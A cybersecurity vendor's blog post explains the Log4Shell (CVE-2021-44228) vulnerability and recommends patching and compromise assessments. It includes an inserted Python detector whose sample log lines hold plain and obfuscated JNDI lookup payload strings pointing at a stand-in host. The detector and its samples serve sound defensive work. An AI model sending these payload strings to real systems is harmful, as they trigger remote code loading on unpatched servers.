Why is Apache Log4j vulnerability so serious?
Author: Nyan Tun Zaw, VP, Athena Dynamics
Advisory Editor: Ken Soh, CEO, Athena Dynamics
Up until last week, many of us were probably not aware of what Log4j is or whether we have it in our systems. With the discovery of CVE-2021-44228 (also known as Log4Shell) by Chen Zhaojun, a researcher from the Alibaba Cloud Security Team, it has now become a nightmare for IT teams, enterprise security teams and product vendors all over the world, the majority of which have been using Log4j in one way or another.
Apache Log4j is a logging library that is widely used in Java-based applications all over the world. Given the popularity of the Java language in products and solutions of every kind, the exposure caused by this vulnerability is extremely broad. Every application has some form of logging mechanism so that developers can understand how users are interacting with it and whether there are any problems or bugs, which can then be used for troubleshooting. This means the majority of Java applications are likely to have been using this library for logging.
From a security point of view, Log4j’s impact is so huge (CVE-2021-44228 carries a CVSS score of 10 out of 10) for a few key reasons:
- The sheer volume of affected systems and products all over the world
  Major global entities such as Amazon Web Services, Google Cloud, Broadcom and Cisco were all reported to have been affected.
- Being a remote code execution vulnerability
  RCEs are always among the worst vulnerabilities to have because they allow attackers to run arbitrary code on the affected PC or server and access everything in its file system, meaning attackers can use them for whatever suits their needs (e.g. to deliver ransomware, spyware, APT tooling, cryptominers, etc.).
- The ease with which attackers can exploit this vulnerability
  To exploit it, the attacker just needs to craft a specific string and get the system to log it (e.g. by submitting the string in a login form or a contact-us form, or by changing their username to that string).
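Because the attack only requires the crafted string to reach a log line, one defensive step is to hunt through existing logs for that string and its obfuscated variants. The following is an added example (not code from the article or from the Log4j project) that scans constructed, Apache-style access-log lines: it first resolves the simple Log4j lookups attackers nest inside the string to hide the word "jndi" (`${lower:...}`, `${upper:...}` and the `${...:-default}` default-value syntax), then checks for a JNDI lookup; the log format, IP addresses and `example.invalid` hostnames are assumptions for the sample.

```python
import re
from typing import List

# Constructed sample access-log lines (not real traffic): one benign request,
# one plain lookup string, two obfuscated variants, and one harmless Log4j lookup.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /login" 200 "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - "POST /contact" 200 "${${lower:j}ndi:${lower:l}dap://example.invalid/a}"',
    '10.0.0.9 - - "GET /" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://example.invalid/a}"',
    '10.0.0.7 - - "GET /search?q=${date:yyyy}" 200 "curl/7.79"',
]

# Innermost lookups (no nested "${" inside them) that are used purely to obscure text:
#   ${lower:X} / ${upper:X}  -> X, case-folded
#   ${name:-X}               -> X  (default-value syntax, e.g. ${::-j} or ${env:NOPE:-j})
_CASE_RE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# What we are really looking for once the obfuscation is peeled away.
_JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _case_fold(match: "re.Match[str]") -> str:
    op, text = match.group(1).lower(), match.group(2)
    return text.lower() if op == "lower" else text.upper()


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Resolve obfuscating lookups from the inside out until the text stops changing.

    max_rounds bounds the work so a pathological line cannot loop forever.
    """
    for _ in range(max_rounds):
        resolved = _CASE_RE.sub(_case_fold, text)
        resolved = _DEFAULT_RE.sub(lambda m: m.group(1), resolved)
        if resolved == text:
            break
        text = resolved
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup after de-obfuscation."""
    return _JNDI_RE.search(normalize_lookups(line)) is not None


def find_probes(lines: List[str]) -> List[str]:
    """Return the subset of lines that look like Log4Shell exploitation attempts."""
    return [line for line in lines if is_log4shell_probe(line)]


if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG_LINES):
        print("suspicious:", hit)
```

A hit in historical logs means the string reached the application, not necessarily that the lookup was executed, so treat hits as triage leads for the compromise assessment described later rather than as proof of compromise.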
It has already been reported that various APT groups and cybercriminals are taking advantage of the fact that everyone is still rushing to fix this, and are delivering their malware via this exploit. It is therefore highly recommended that everyone stay vigilant and make sure all systems in use are patched against this vulnerability (all the major vendors have been rushing to push out patches); if unsure, check with your product vendor as soon as possible to avoid any potential impact on your systems.
As always, it is good practice to perform a Vulnerability Assessment and Penetration Test (VAPT) or a compromise assessment on your systems afterwards to make sure everything is patched and that no APTs are still lurking in your network, whether via traditional human-led penetration testing or robotic penetration testing tools. We have also written about some quick differences between the two approaches here.
Please do reach out to us if you would like to find out more on how you can improve your cybersecurity posture.
Disclaimer: The opinions and the outcomes of the best practices introduced in this material may vary due to environmental and contextual parameters. Neither BH Global Corporation Ltd, Athena Dynamics Pte Ltd nor the writers are responsible for any direct or indirect implications or impacts on readers arising from the adoption of these practices.
Nyan Tun Zaw is the VP of Business Development at Athena Dynamics Pte Ltd, which is a subsidiary of BH Global Corporation Ltd, an SGX mainboard listed company.
With a broad background in cybersecurity, software development, web development and networking, Zaw has in-depth experience deploying security solutions for several highly confidential government and critical infrastructure projects, particularly in the CDR/CDNR field as a technical lead. His interests lie mainly in cybersecurity and AI/ML.
Zaw holds a Bachelor of Business Management, with double majors in Finance and Information Systems, from Singapore Management University, as well as a Master of Business Administration (MBA) from Quantic School of Business and Technology. He also holds the Certified Ethical Hacker (CEH) and EC-Council Certified Security Analyst (ECSA) certifications.
Being a technical person who also likes sharing his experience and knowledge, Zaw has been part of speaking panels with global C-level executives at various events and conferences in the region.
Contact: [email protected]
Ken Soh has held concurrent appointments as Group CIO of the mainboard-listed BH Global Corporation Limited since 3 Mar 2014 and as the founding CEO of the group’s subsidiary cyber security company, Athena Dynamics Pte Ltd.
Ken has more than 25 years of working experience in the ICT industry. Prior to joining BH Global, Ken held various senior positions in public and private sectors at CxO and business leader levels with Master Planning and P&L responsibilities.
Ken has been an avid industry speaker and writer. He holds a Master of Science in Computer Studies from the University of Essex and a Master of Business Administration (eMBA) from the Nanyang Business School (a Nanyang Technological University and University of California, Berkeley joint programme).
More information on Ken’s past industry and media sharing is available via this link.
Contact: [email protected]